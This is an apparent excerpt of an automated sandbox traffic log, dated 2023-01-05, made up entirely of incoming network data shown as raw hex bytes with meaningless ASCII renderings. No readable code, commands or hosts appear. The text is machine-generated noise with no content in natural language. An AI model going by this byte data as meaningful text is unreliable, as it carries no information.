2a 17 bc c1 9c ca e2 bc 1d 90 2f 57 66 5c 78 80 7c ed 24 f2 e2 86 c5 77 6d 77 87 90 62 43 85 ad 90 7a 1e 32 25 68 a5 6c fc 4c 2e 15 0d 6f 27 82 fa c3 Data Ascii: ?[g4~\Lt?<>D1Bw~M]l{']=`9QLPZGNQaXRPyuR]hp$MgF2Umil>LOC\|[_t8:Ielk63[]7jO6N\|:8/T9)b-~B1M{y*/Wf\x\|$wmwbCz2%hlL.o'
2023-01-05 12:18:10 UTC	1466	IN	Data Raw: 44 cf e9 c8 d7 3f 82 ea 07 34 c6 78 82 8c ee a0 99 68 c7 9d d2 b2 ec 72 25 ef 7e d1 d3 a3 46 fd 21 e3 0a 71 38 cf 94 e7 c7 d5 58 30 ba ab d9 0a 53 82 26 cf 5f 4d 46 bf 69 19 e6 fd d8 ba e7 6a 30 6c 1a 78 4d 74 b8 c6 cd 3c 57 4b 34 ed 4b d4 c2 c2 73 f8 ce f0 d0 74 95 df 3b 5b 25 00 3c 81 f1 3d 4a 79 51 51 c6 6d 9d 68 95 2a 7f 00 8f 0f e9 6b bb f7 e5 c1 34 86 c4 51 b3 6a dd 69 24 fe f5 c1 19 da aa d1 e0 c0 00 55 c4 c7 e5 1a 5e bb ba 01 35 a4 f1 22 9a 88 fc 85 61 32 4c 2e 5f 3b b2 71 51 4a 9a 49 4d 5b dd e8 bc e9 b5 ca 55 3b d3 07 9f 28 a2 e4 32 2f 16 b6 fc 12 34 bc 38 40 95 82 07 fd c3 e4 48 1f d6 c5 de bf 7f 9b 4d 1e 13 2f 98 f0 70 9e ad a9 0d d6 df 19 91 0b 31 0f 99 62 6a 6c 9d f0 2a 23 ad 0e c8 0f bf f0 80 dc 13 e3 44 06 5f 0c c8 8b 2b 20 63 e6 e9 89 28 Data Ascii: D?4xhr%~F!q8X0S&_MFij0lxMt<WK4Kst;[%<=JyQQmhk4Qji$U^5"a2L._;qQJIM[U;(2/48@HM/p1bjl#D_+ c(
2023-01-05 12:18:10 UTC	1482	IN	Data Raw: 24 54 3f fe 8e 46 ec 77 d1 e4 d7 f9 3a cc 02 39 15 cc 83 fd a4 2d 0b fb 24 ea bf ec 1e e5 65 13 46 d8 13 13 8d b5 77 63 7d 4e d5 47 4e 25 33 7d 2d ef 85 8d 23 71 28 e7 bd 32 d6 18 14 6b e6 43 a1 e8 59 8f 9a 90 79 93 10 66 8a 7b ba 3c c7 c8 b0 48 dc c9 b6 f3 6b 8e ec 06 ad 5e fa 07 b1 a9 a1 b3 a8 83 ec 74 04 8a 1d 0d cb cb 04 83 d0 09 bd 98 ce f8 19 d1 c1 da 21 b7 aa f7 8c 0c 41 a1 39 d0 b3 2e ef 01 5b 12 35 fa 47 ae 07 96 6f 9b 8e f3 54 2c 6e 9c fc 51 35 a6 30 d0 85 46 72 aa 4f 44 ea ae d3 77 1e 0c e5 25 fe 9a 2d 31 46 eb 30 0b 48 8d 88 94 ac 9d 63 2c 5d 7a 7d 91 45 f8 b0 ec 5e ba e5 4e 74 67 b8 72 44 9d 08 4b 41 ae d1 f7 07 2b 4c cb e3 ef 48 f1 63 19 92 05 59 e3 35 52 d9 82 f5 f9 ef f4 fb 4f 8f ec f6 4e 57 b7 5c dc d4 83 f1 0e 4f 90 a9 15 4b 88 6c 31 f4 Data Ascii: $T?Fw:9-$eFwc}NGN%3}-#q(2kCYyf{<Hk^t!A9.[5GoT,nQ50FrODw%-1F0Hc,]z}E^NtgrDKA+LHcY5RONW\OKl1
2023-01-05 12:18:10 UTC	1483	IN	Data Raw: e3 58 d8 7c 65 fd c2 c2 35 e4 63 34 f4 df e3 ca 7a 0f 39 c3 ff 29 5d ef bf 5f f9 3e f8 84 57 61 7e ee 24 8c 4d 72 35 6f c0 ff 33 b2 b4 3f 46 d7 b2 48 42 ef 17 e4 4c 99 8e 6e dd fe 14 b6 15 11 c3 f8 9c 93 97 13 ea 0a 0a f4 0f c5 63 e8 95 78 9a be d6 d9 f5 88 dc 29 0e 35 5f bb 7a 1a 7f 62 cd bc 3f 73 36 de 67 31 ff 6f 45 39 e6 33 03 f6 d5 03 ba 93 05 e4 fe c6 75 6e db 5c c7 15 a2 3b fd 87 7f 6e b0 c5 47 fb c5 3b 86 9e 38 c1 5e 8c e0 61 dd 55 62 96 eb 49 a4 17 6d 37 e7 7d 33 c3 58 2f be b8 23 dc 3e a2 7f 3d 90 ba 19 b0 f9 4c e2 d5 c3 38 f5 86 72 e2 f5 12 e3 b7 33 e4 ed f4 48 23 d6 36 9d 71 ca bf 55 9c 1f cc 47 af 48 ea e7 26 5d 7d 42 c7 76 94 89 b1 58 2c da 2f 16 e9 e2 98 19 be 4c 57 ca f8 f7 94 0e ef 70 5b 9c d1 0f 59 23 60 44 57 02 bb ca ad b7 ad 14 59 52 Data Ascii: X\|e5c4z9)]_>Wa~$Mr5o3?FHBLncx)5_zb?s6g1oE93un\;nG;8^aUbIm7}3X/#>=L8r3H#6qUGH&]}BvX,/LWp[Y#`DWYR
2023-01-05 12:18:10 UTC	1499	IN	Data Raw: 20 8f 30 c0 bb 02 00 33 e0 f5 d1 c3 fd 0f 01 0f 40 52 f8 7a 4e 80 db 6b f7 0e 60 e5 73 80 d7 f0 cf 23 5f 5a 01 dc 86 8f 37 12 7c 5e 95 c0 f7 a1 57 4f 01 7e 86 8f 7b 28 dc af e7 c0 f7 1d 53 3c 80 31 2f 00 7a c0 fd 39 29 dc 6f a1 47 00 ec 83 fb 5d 66 b8 3f 9f 7e 03 b0 bd 05 60 7f 1d 40 c3 13 80 b2 f0 f5 4d 07 5f 8f 2f e1 7e 60 e1 1b c0 ac 27 00 ed e1 fb e3 32 bc bf 8d e1 fb d5 1f f8 7c 08 85 8f bb 1c 18 e0 00 7c bd 23 a5 00 3c 81 cf d3 1d 37 80 9c 3f 00 9a c1 e7 21 d7 4f 80 93 01 00 23 79 01 fa c1 d7 c9 53 6a 80 43 f0 75 1a e2 01 10 d7 17 60 01 bc 9d 31 8d 00 fd f9 01 d6 c1 e7 c1 18 2e c0 37 0b 00 57 e1 fd 5d 08 5f 37 60 f8 3a e8 86 97 67 7f 0d 50 06 3e af 1a e1 fe c9 09 6e 57 80 06 c0 ca 7d 80 41 f0 79 e0 e9 0e d0 1c de 8f 77 e1 76 75 c1 fb f9 9c 06 20 26 Data Ascii: 03@RzNk`s#_Z7\|^WO~{(S<1/z9)oG]f?~`@M_/~`'2\|\|#<7?!O#ySjCu`1.7W]_7`:gP>nW}Aywvu &
2023-01-05 12:18:10 UTC	1500	IN	Data Raw: 68 1e bc 47 fe 25 8a f6 b1 93 68 5e 24 91 9f 8b 25 bd b5 a7 72 5e 64 af 05 e4 9f 5f a1 f9 1e 4f fd 78 95 fc 71 38 f9 4d 3f 5a 27 66 52 1c d0 af 0e a6 ed 28 2e 6d 43 f6 f3 11 cd a3 1b 14 4f bf 51 8c e9 8b e4 97 d7 53 bc 36 8c f4 d8 84 f4 d5 87 f6 3d a7 68 dd 0c a5 f9 25 d3 ba 92 45 fb df 60 8a 03 de b8 4e f7 43 fa 3a 40 fb d2 89 64 cf 7f 50 3f e7 93 9f 9a 48 fe 3a 87 fc cb e7 b4 8e 34 a7 fd fa 68 5a 7f 87 91 1d 2d a6 f8 77 0d ed 37 9e a7 b8 b7 11 f9 d5 2a 64 3f 71 34 ce cd 68 1d 49 3f 80 e9 53 b4 fe 5e 22 bd 1f a5 75 be 33 f9 eb 59 2b 31 8d a5 7a bf 27 3d 7a 93 5f 7f 82 e2 fa ad 34 7f 13 68 7e 1c 23 7f b3 90 ee f7 53 da 77 35 a1 fd c7 35 1a cf 0c d2 cf 68 b2 e3 16 74 bd 0a ed 03 3f a5 78 74 4b 2b 4c fb 52 bc 5e 99 f6 bf dd c8 3f 76 26 7d 56 a4 54 fb 18 d3 Data Ascii: hG%h^$%r^d_Oxq8M?Z'fR(.mCOQS6=h%E`NC:@dP?H:4hZ-w7*d?q4hI?S^"u3Y+1z'=z_4h~#Sw55ht?xtK+LR^?v&}VT
2023-01-05 12:18:10 UTC	1516	IN	Data Raw: 56 cf ed f4 75 ef 69 65 f1 9c 4b 86 3a 1e d2 3d 8c 8f 42 74 af f1 f9 5f d7 77 7b bd de 45 5c 76 cb 7a ef 7c ff 7f 7d 2e e3 2e bf 7b fb b8 d7 38 18 ff b9 ce ad 3d 9a dc 4d 3f cb eb bb f7 f3 2a f7 76 8f 56 fa eb eb 7f 6d ef b7 bb fe e7 7d 41 97 7a b7 aa e7 9f e6 7f 7a ff 78 a7 fa ef 75 7e fc 53 f7 fb cf 9f 9f fd 27 ea 2b 5f 7f e4 db da cb 9d f8 ef 96 fb 6f b5 73 af e5 fe 97 ef 7f f9 fe ea fa bf cb 77 7b be f0 e7 72 77 db ce ad d7 85 db 97 9f 16 83 ed cb 2d a4 5b f0 ed e3 b9 dc 70 6b fa 39 ed 83 72 c3 ad ef 7b f6 08 c3 7a 8e 56 ba f5 75 7c ee ae de 46 7e bb fc d6 eb f2 1d ea 97 41 bd 63 fb 9e 61 f8 fe e1 bd f6 e3 b5 ea d6 e7 a4 98 4f a5 7c 1a e5 d3 a9 7e c3 59 ff dd 95 73 e5 43 b9 42 72 95 e4 da 3d c6 bb ff f9 e7 48 ee e9 df 8d 7f ff 99 38 de b5 8f 1c ee f6 Data Ascii: VuieK:=Bt_w{E\vz\|}..{8=M?*vVm}Azzxu~S'+_osw{rw-[pk9r{zVu\|F~AcaO\|~YsCBr=H8
2023-01-05 12:18:10 UTC	1517	IN	Data Raw: 7d e6 c1 24 d6 9f 97 d9 67 3a fb cc 60 9f 3c 56 3e 8f dd eb ab 2c 7d 95 a5 73 59 3a 9f 5d cf 67 9f d7 d9 67 15 fb 78 00 7e 43 57 2d f1 cd bf 9e 70 08 5e aa cb 7f c1 da 5b a4 87 35 87 d4 2e 5c fc 02 bb d4 4a fc 72 48 0c fd 62 48 8c 54 26 7e 19 24 46 c2 5f 60 0e 05 2e df ea 11 08 9c 4b 3d 7a d2 2f bd 46 00 4f 13 bd c2 01 eb 89 12 3c ce 27 16 ce 31 2b ee 67 8f 85 34 36 4b 07 da 5b 00 fe 12 6c 22 d5 93 4c f5 5c 92 f0 1b 89 2f 49 f8 cd fd c3 64 fc 86 cd 1c 91 9e 90 c6 cb f8 8d 5d 53 65 bc 8f 99 c4 f3 44 fa ed 7d cb 88 57 53 ba 9e d2 4d 94 7e 49 e9 1e 4a 0f 51 7a 82 ea 3b 2b d2 a4 fb af d1 75 49 c1 eb 1e 94 3a 14 bc 1e 42 1c 2e 52 23 b4 16 71 0c c9 9b 8a f4 84 94 40 d7 3b 88 f4 a1 4a 28 ef 59 a9 a7 48 8f 42 08 64 34 93 20 59 19 a0 ac 64 de 29 c9 c0 34 a4 f2 20 Data Ascii: }$g:`<V>,}sY:]ggx~CW-p^[5.\JrHbHT&~$F_`.K=z/FO<'1+g46K[l"L\/Id]SeD}WSM~IJQz;+uI:B.R#q@;J(YHBd4 Yd)4
2023-01-05 12:18:10 UTC	1533	IN	Data Raw: 72 9d c2 d1 14 5f 71 e7 da 7e e1 11 55 54 c6 d9 1c 2b 0a 42 a7 d5 00 57 5e e4 a9 a6 a4 c7 42 45 30 7c 42 1d 21 2f 51 28 47 5e 4c 54 c8 5b d1 c0 f3 f3 b8 4c 06 4f 7c e6 a7 19 51 7e ce 22 4c b2 38 2b 88 b2 b8 d2 8e 6c f2 ec 88 ea 72 c5 bc 75 d2 d0 23 ca e1 ca 6d 66 a1 96 47 3a 7b f9 12 23 37 73 03 a2 0a be ce 01 ea 58 18 13 25 b9 8e 0d 45 29 4a f4 bd 78 99 77 bd c2 cd 74 0a 79 25 72 e3 24 d4 94 c7 3b 29 0b 5a 81 13 6b 1d 80 af 81 b1 23 cb 25 2a 0b 58 84 be 5a 55 47 94 c7 47 7b 52 b4 3f 9a 72 f8 ea a3 30 4d d2 a1 50 7c fa 23 90 91 a7 29 6e 05 b8 be ab c6 90 a9 dd e0 43 8b a9 0b 25 96 aa 1e 57 2a d2 3c cf 25 51 92 2f ef b4 b3 2c cf 74 0a 79 c7 e1 59 78 32 49 65 23 e4 a6 99 0c 4a 2a e5 23 9c 31 da ba 58 3a ad 46 89 51 4f 52 4d b9 49 45 d3 cb 5c a9 29 de da 78 Data Ascii: r_q~UT+BW^BE0\|B!/Q(G^LT[LO\|Q~"L8+lru#mfG:{#7sX%E)Jxwty%r$;)Zk#%XZUGG{R?r0MP\|#)nC%W<%Q/,tyYx2Ie#J*#1X:FQORMIE\)x
2023-01-05 12:18:10 UTC	1534	IN	Data Raw: 28 51 7e 65 f1 89 95 c4 7e a0 73 83 6b 0e 56 9c 04 44 85 7c fa de 8f 64 14 6a 8a af 90 94 71 68 c5 3a 85 dc ac 00 61 6b 2a e1 06 42 ea 25 a1 a6 02 9e 0c a4 3d 4d 88 72 2b 93 0b 32 2b 34 65 f3 71 6c 2b f0 dd 94 28 8b 7f 6b e6 38 68 29 43 5d 89 f8 4c 96 cc a5 ad 29 3e 48 68 cb 1c dd 1d a5 90 cf 3c fa e8 1b bc d0 6d f9 f9 8f 6f a7 11 51 05 37 7c 6c 89 ee 46 87 4a f9 e7 09 a1 1f 68 2a e2 56 5b ea 15 49 16 ba ad 06 b8 bc c4 cd 0b a2 3c be 02 59 29 5f 56 44 05 20 ae 5a 88 79 49 f1 4f e8 1d 64 86 4d 54 c4 17 ff 4b 94 1a 4d 55 c6 f4 64 9c c5 9a 0a f8 38 76 a2 86 8f 89 72 2b 23 81 ae 23 7d a2 3c 3e 1e 65 17 d0 52 74 28 3e aa 6f 4b 27 d1 54 c0 47 0f 50 9a 60 9b 51 61 e3 b6 5e a4 56 fe 11 55 f0 21 53 27 8f 7c 4d 65 7c 4d bb 83 26 2f 89 dc 56 2b 3f 83 30 f0 35 65 55 Data Ascii: (Q~e~skVD\|djqh:akB%=Mr+2+4eql+(k8h)C]L)>Hh<moQ7\|lFJhV[I<Y)_VD ZyIOdMTKMUd8vr+##}<>eRt(>oK'TGP`Qa^VU!S'\|Me\|M&/V+?05eU
2023-01-05 12:18:10 UTC	1550	IN	Data Raw: 0b 8f 28 99 90 f1 bc aa 9b 1a fb bd 82 45 a3 26 d1 c8 1f cb 10 c4 91 a5 97 38 0c 8e 0c 7b d0 ed 99 c0 e2 30 ab 2c 5f 78 67 e9 a2 f0 a1 d2 2d 23 6c 51 b3 af 01 8c 5e 6f 17 43 cf db 07 42 c4 13 eb 81 0e eb 9c 95 48 a8 97 66 f2 73 0b 8b 01 a2 0a 27 35 ce 99 98 c5 b0 5a 01 cf 77 2d b2 fe 71 26 8d 50 ec a0 4c 4d 10 a9 86 c7 4d 61 17 99 76 b4 a0 a3 39 88 1e 94 69 51 ae ce 6d df 1c 8f 02 36 15 cd c8 e9 aa 75 fe 64 84 47 c4 87 05 ea 16 fd 68 68 74 c5 88 f5 9c e9 cf 6b 34 56 fd 4b ce 9a 6b 50 3a fb 5b 64 03 3b 57 66 c0 ed ae 2d 9e 7c dd 1c 8d 02 f5 c0 d3 75 05 53 a5 36 ed 69 9f a8 05 bc 83 63 60 dd 99 4c e8 64 69 57 83 a7 2b 76 d4 cd 95 59 c2 64 e3 b1 39 57 e2 72 09 9c eb 73 05 b8 09 b8 74 7f d5 c8 27 8b c4 81 42 81 ca db 6e 9c 59 ee 17 33 d6 a3 bc 63 a2 ec ce d9 Data Ascii: (E&8{0,_xg-#lQ^oCBHfs'5Zw-q&PLMMav9iQm6udGhhtk4VKkP:[d;Wf-\|uS6ic`LdiW+vYd9Wrst'BnY3c
2023-01-05 12:18:10 UTC	1551	IN	Data Raw: 86 60 72 d1 3b b3 ec 73 c1 31 86 1e 39 f5 63 e3 16 ba c1 c7 3a 75 db c0 01 ba b5 a0 01 5f 35 39 eb b9 25 44 cc 97 99 31 2f 78 bc 48 fb 79 d2 ad 64 a0 16 e6 9a 89 f6 b8 04 3e ac 75 43 74 30 3e e6 de 6e 61 31 d9 fb 63 2a bb d1 8d 38 7f 04 11 9b f5 c1 d7 d8 73 bc 47 33 50 85 a0 d4 e1 e2 11 ae 6f 65 3b dd 44 6f 63 26 10 57 0a 77 d0 96 07 0c 94 c0 41 37 d9 bb 0e 62 57 dd e1 93 3a cb 33 7c b1 e0 2a e8 61 6f 4a 9f 2a 13 92 cd bc e9 5c 0b b2 8f a9 1b fa 7d c4 87 f7 91 c7 ed 0e ac d0 86 7c 5f 20 7d 1b 35 8b 40 7e 56 bd d5 b6 89 2c a3 a0 a0 31 f6 e6 f5 c5 a4 69 c8 05 82 6a f0 ac af 71 ef 15 4a 94 d0 23 f4 63 6d a1 4c 0d d0 2a 41 3f 1b 0f 83 10 e4 a5 44 a4 49 04 87 0c 66 29 43 68 bd db e8 ce 12 08 87 b4 b5 4b 31 f4 b9 6d db f0 da 88 a4 43 87 b8 0a 47 38 1d 8f 47 e7 Data Ascii: `r;s19c:u_59%D1/xHyd>uCt0>na1c8sG3Poe;Doc&WwA7bW:3\|aoJ\}\|_ }5@~V,1ijqJ#cmLA?DIf)ChK1mCG8G
2023-01-05 12:18:10 UTC	1567	IN	Data Raw: 79 e1 f2 e0 69 3b 71 4d da 5d a3 b6 6b 25 7d 8e dd cb d5 d8 5d 5d eb 1f b6 f3 2f ae 68 68 b5 f7 58 f9 33 9e f6 a4 8f f0 9b 2f 8e b9 ee cf 3a a6 83 ac cc ec 64 8f bb 1d 50 49 cb 5f 69 65 cd 73 8d 99 a7 5c 3b ed 17 af f9 15 d7 f2 bc 1a 33 ee 01 cd 2b eb 3b a5 66 40 ec c4 27 fe c5 4a 27 da 1a b6 78 eb 63 bf e4 66 13 d1 7f 24 1e cc ac 85 78 04 a9 d2 dc 31 5a a9 be 1f b0 20 aa 3b 4e 7c 73 fd 25 06 3b 4a 54 fc b8 ce d9 04 bf 6e 1d 7c c9 11 c0 62 03 34 12 bc 60 05 07 f1 ba 3d 5e 1f 27 ff 3c 61 3b ff d8 b1 ff fd bf 7d f8 53 0e 52 bc 86 25 fe 3d 06 10 fe 69 f8 3d 7e fe eb f0 b7 18 43 78 8d 5e fc 23 c6 2f 5e 43 0f af 41 86 ff 1d 03 15 7f 1f fe 2d c6 18 0a 3e ad fc 8b 3f 62 70 e2 ff e4 00 c4 ff e0 b3 7f e4 6f fe 1e ff ea df e3 ef ae 61 8b 1a 6c f8 7b fc a4 81 8a 7f Data Ascii: yi;qM]k%}]]/hhX3/:dPI_ies\;3+;f@'J'xcf$x1Z ;N\|s%;JTn\|b4`=^'<a;}SR%=i=~Cx^#/^CA->?bpoal{
2023-01-05 12:18:10 UTC	1568	IN	Data Raw: 83 6a f3 bb cf 14 dd b1 51 05 0f c9 32 d2 74 6d 68 2b 78 10 5a 6a 05 5d 3e 64 8a 66 24 6c 74 53 92 fb de 39 91 e0 f4 8d 49 d7 89 b9 d7 6a 31 71 41 0b 9c ed fb 3d ed 23 44 24 0c 41 05 7c 48 6b 49 b4 a5 c2 3e cb 48 4a 04 98 4a 5a 3e 62 18 27 6e 46 90 48 89 d5 92 f5 54 43 32 cd 69 73 49 ef d6 ce 94 cf b8 82 3c cd 02 56 2a 64 87 ee 54 99 86 3d a0 ec 88 fd ad 2c ce c8 4d bd 9f 0c 79 ea 77 c0 1e f6 58 a9 a1 25 64 2f c2 15 15 a8 57 c4 0c 23 b6 5c b3 09 e6 b6 5e 13 cd 11 8f 98 5a a5 10 2d 47 f1 e5 04 64 ff d0 c4 57 de 26 59 c6 b2 9e 3c cf 05 e5 25 5c b4 70 be 3d 97 6b 68 27 5b 52 0f 09 3c 25 9d b4 ec c6 c4 7a e1 13 8d 1f 6b 14 be cc 41 1c a6 20 5c 45 52 38 ec 10 49 9a db 39 7f c8 b4 14 84 f4 10 6d 60 7a c2 82 44 18 6f ca bd 74 4f 60 98 bb 85 02 b4 8c b7 d5 ee fb Data Ascii: jQ2tmh+xZj]>df$ltS9Ij1qA=#D$A\|HkI>HJJZ>b'nFHTC2isI<V*dT=,MywX%d/W#\^Z-GdW&Y<%\p=kh'[R<%zkA \ER8I9m`zDotO`
2023-01-05 12:18:10 UTC	1584	IN	Data Raw: 62 33 bc 06 62 f5 04 55 b6 c7 de cd b2 bf d0 e5 5a a4 49 0d 82 c2 a2 2a 0a ec b0 00 95 a7 77 07 de 26 5a 95 cc 5a 66 cf 56 19 23 7a 4e 6b 31 4a 61 e4 0b d6 c4 29 3b 68 b5 6b bc 8f e1 00 d0 2f f3 13 16 f9 ed 64 59 02 14 d2 d6 84 65 2e 19 22 c5 7c d4 a0 af c3 87 ef 33 5d a1 43 c7 4a ff cd e5 e2 3b 28 db 41 76 68 69 13 22 3a ac 2c 6a 90 1f 05 74 ab 5d 8f 3c 35 cd e7 88 06 54 f9 55 e8 0d 69 33 95 cc 68 56 56 ac 57 51 90 64 b9 95 12 5f 03 75 a9 f5 5e cd e6 23 4d 2e 69 a9 a0 41 6f 90 5c 11 c3 84 56 c4 0c 89 cc 3c f2 77 60 01 a1 3f 6b 7c ec 2e 27 3d 1a 3c 8d f1 20 4a 91 4d ab 33 01 6c a4 b4 44 44 b9 da 67 6e 0f 30 db 1c b4 e5 92 57 d9 01 e3 a9 18 50 4f ba c5 57 a9 f3 dd 9a 83 a6 03 1d de 46 cb 2c 2e 16 36 a8 5d 82 58 67 8d 1b a3 d8 f9 19 51 16 29 7a e6 9a f5 37 Data Ascii: b3bUZI*w&ZZfV#zNk1Ja);hk/dYe."\|3]CJ;(Avhi":,jt]<5TUi3hVVWQd_u^#M.iAo\V<w`?k\|.'=< JM3lDDgn0WPOWF,.6]XgQ)z7
2023-01-05 12:18:10 UTC	1585	IN	Data Raw: fc 45 65 ca 41 9f ef f1 12 cb 4c 3d 13 3d 39 e5 ad e5 c3 73 5b 22 9d 20 b1 29 f3 b6 a4 8d 07 2c 7d d0 d2 7f e5 19 47 56 75 e9 9a 20 b0 9e 82 99 75 ff 6c d2 16 78 15 74 c6 0a c2 62 e8 68 d1 38 36 60 67 ea ca 1e 05 65 d2 af b1 45 5c c3 dd 4a 3e 6b b0 cd 5a 7f 35 58 45 58 15 59 10 c5 75 7a b3 3a 3f 9d 90 f5 1e 14 01 db 41 a9 5a 8b 66 12 d1 2d d0 c5 c0 c8 aa 18 59 a7 d3 d4 78 e5 b2 4b ab dc f2 b7 20 2e 28 b2 57 16 a8 d0 c0 68 b5 90 d4 1a 34 98 f4 7f 1c ab 48 bd 46 1f 45 e4 5f e7 f2 42 21 a4 e9 a8 45 9b 47 1c da 64 9b 2f 3f ab 44 2a 97 ad 37 64 0b 06 ee d0 93 77 68 b3 e4 89 1e 38 a2 e3 23 56 0b bc a4 64 3d 0b 47 1a b2 af 16 c9 f8 4a 79 8b ac 61 c3 0f 90 c6 5e e8 b2 43 26 b2 a8 d1 5b 8b cd 2e fc 3d 96 1c 41 43 8c 38 f2 2c ba 82 c6 32 34 56 8c 70 78 0b 15 d1 4b Data Ascii: EeAL==9s[" ),}GVu ulxtbh86`geE\J>kZ5XEXYuz:?AZf-YxK .(Wh4HFE_B!EGd/?D*7dwh8#Vd=GJya^C&[.=AC8,24VpxK
2023-01-05 12:18:10 UTC	1601	IN	Data Raw: 09 1e b0 3c 25 98 1d 65 f1 cd fe 4f cc ca 61 01 b7 58 ae 5b ec 39 77 6f 5e 0f 90 a6 c9 3a 14 16 81 db 93 5d a9 49 05 02 18 3e bf 68 40 c7 24 a8 36 71 6c bc a0 cf c6 d5 fa d3 f1 ea e7 6b 39 c3 ca bc ef a6 18 94 be 55 5c 3b 5c d1 19 13 e0 a4 96 12 e3 d7 a1 95 18 c9 a9 c5 c8 5c 15 7a e5 8b ff cf d5 b9 e5 48 af db 40 d8 bd 82 e0 60 70 96 31 80 25 4b b6 f4 e8 be ed 7f 49 89 55 5f 51 9e 20 0f 49 e6 ef 8b 5b 12 c9 62 b1 48 65 82 6b 09 60 e6 4a 8b 99 a5 0c 33 93 c6 37 28 95 79 a1 99 2e a1 39 76 5d 59 20 f2 c9 be 9c 83 59 5e 09 e9 82 28 47 cc ab 38 80 da 02 40 a3 5b ea c7 77 be 49 b1 7b fd 47 4a d4 f7 22 a5 9a 01 e5 07 de f8 00 c8 68 da 93 b5 cd 9e 72 f7 44 3d 21 a0 71 44 67 40 09 d5 9d 18 af 95 df 57 81 3c 62 a1 d6 01 25 3f 70 69 3e a3 27 b0 d3 3a 92 0c 28 95 c5 Data Ascii: <%eOaX[9wo^:]I>h@$6qlk9U\;\\zH@`p1%KIU_Q I[bHek`J37(y.9v]Y Y^(G8@[wI{GJ"hrD=!qDg@W<b%?pi>':(
2023-01-05 12:18:10 UTC	1602	IN	Data Raw: 57 91 12 dd 98 39 ac 65 78 d8 53 53 3a 9d 31 7d 40 0b ae e9 7c a8 92 ac 11 df d3 c8 12 54 c3 3b 6f da 83 2d b2 9f b4 54 ee c8 9e 4f 65 df fd 61 6e c5 07 52 4f 13 d1 ad 52 d0 7c bb 79 f7 f6 87 d5 5b 17 21 38 77 c2 ac d8 b2 b4 c6 0f 32 f2 42 a6 a8 95 f1 4e de 7b 9e 06 5b 40 7e d3 f1 fd 05 1b b2 b6 3f 81 60 e4 83 94 05 64 90 99 10 c6 0a 8b f0 46 7d ae 1b 9a 34 7b a0 a0 eb 7e 32 3b f0 0b a2 54 65 59 1d af 2f e8 d9 04 5d 5c 60 35 1a bd d2 f6 a9 d2 6c 2c 71 a3 a5 5e 23 2b 5e 02 fd 08 e9 74 2a ab fe 75 99 c8 2f ac a4 da a1 14 ad ca d2 a4 26 fd 82 d9 a5 40 d6 e9 f8 c4 39 7e 53 72 51 f6 bc 30 93 59 64 a2 56 4e 0a 11 f9 f6 83 bc bc df 7a 88 f2 38 77 ae 9b ca 4f 6a 9e 6f a6 2b 47 75 e0 03 ac f8 21 d7 79 a2 6d 15 d6 31 fa 7f 07 66 12 22 96 8e 1f 9d 1d b1 4b 0c 81 fe Data Ascii: W9exSS:1}@\|T;o-TOeanROR\|y[!8w2BN{[@~?`dF}4{~2;TeY/]\`5l,q^#+^t*u/&@9~SrQ0YdVNz8wOjo+Gu!ym1f"K
2023-01-05 12:18:10 UTC	1618	IN	Data Raw: 63 24 be 45 35 55 dd 96 59 b7 9d 4a aa 92 de ff 1e 0e 57 4f ab dd 17 0f d0 62 7b 28 12 f9 5c 60 a7 37 4f 6d 74 9c 5f a7 0a 51 c1 b6 72 d5 5f d1 52 63 85 4f be f0 80 4b 35 9c 70 ca 73 b3 d6 04 4e eb fa b6 46 28 47 9f 3f 5b 78 6b 7f db 0a 8e bb 3b a8 07 3e 3d c3 e1 c3 1c 96 37 1e 76 f6 79 6b 9a 19 56 a7 6a 5b 0e 05 b4 86 23 75 c5 35 6c af bb b4 89 cc 84 b2 81 03 d2 ea ae 7f bc 9b e5 c8 74 7f b7 b8 ee fb f7 d5 99 09 cb 35 af a9 b1 ba ea cf 63 87 7e b4 8f d6 4b 56 b8 67 f4 09 33 a6 03 c2 9a 45 75 af dc d3 c5 53 01 c2 db 12 ca 8a 76 26 87 5b 43 3d 58 23 97 3b bb be 99 71 07 4d 26 d5 47 3e ea 16 1d 88 35 85 4a c5 98 ec b8 91 47 35 d8 b5 c0 27 4d 8f 88 ad 82 9e 50 a9 c2 9e a1 5c 51 33 57 38 01 12 ef ad 92 c7 c4 b3 42 33 a2 15 19 2b 36 a6 7d 9a f8 3f 55 8d 77 35 Data Ascii: c$E5UYJWOb{(\`7Omt_Qr_RcOK5psNF(G?[xk;>=7vykVj[#u5lt5c~KVg3EuSv&[C=X#;qM&G>5JG5'MP\Q3W8B3+6}?Uw5
2023-01-05 12:18:10 UTC	1619	IN	Data Raw: 1f 4f 68 e1 83 d2 b6 fb 77 2f e7 73 e3 f2 1d 4c aa c4 0d 4e b8 52 29 6a 8d 13 0b ee 6c fd 4c 3b 3b e9 12 cc 59 cc f2 c4 f5 3d 61 29 e1 19 f2 34 c3 ec c6 5d fb 9e 01 5f b1 4a 05 55 4f fe a5 9b aa 94 63 36 57 23 f3 5a b8 62 de 2b dc 08 fb ae d1 76 d7 f9 e9 03 69 19 ea 0f 72 4c 58 ad e9 79 76 21 6c da 9d 69 a1 07 9d 31 b7 7a e8 9d 36 9e d7 2f f7 63 02 f7 27 d3 4b ba 83 39 35 c0 27 66 97 76 62 0f ae 2a 73 d5 ee 87 3a 3f 51 d7 ec 5a e5 0e 45 5e 60 f5 1d 62 37 ef 67 ec 8e 59 75 2b 53 13 56 54 83 19 fe 92 27 e2 5e 08 25 2e de 8e 67 1f 4b 54 09 3a ca 1f fb 45 d4 ff 3c 07 7f 2c 31 65 1d 07 0b ef b0 a6 11 57 28 1c 11 fa f7 78 8e f2 fa 93 43 f5 16 0a e8 73 9d 59 93 da e2 cf 35 13 72 6c d7 38 bf 23 87 97 75 9f 93 eb d9 64 25 ea dc 2f 6a 7d 16 1d da c5 1c cf 7f fa c1 Data Ascii: Ohw/sLNR)jlL;;Y=a)4]_JUOc6W#Zb+virLXyv!li1z6/c'K95'fvb*s:?QZE^`b7gYu+SVT'^%.gKT:E<,1eW(xCsY5rl8#ud%/j}
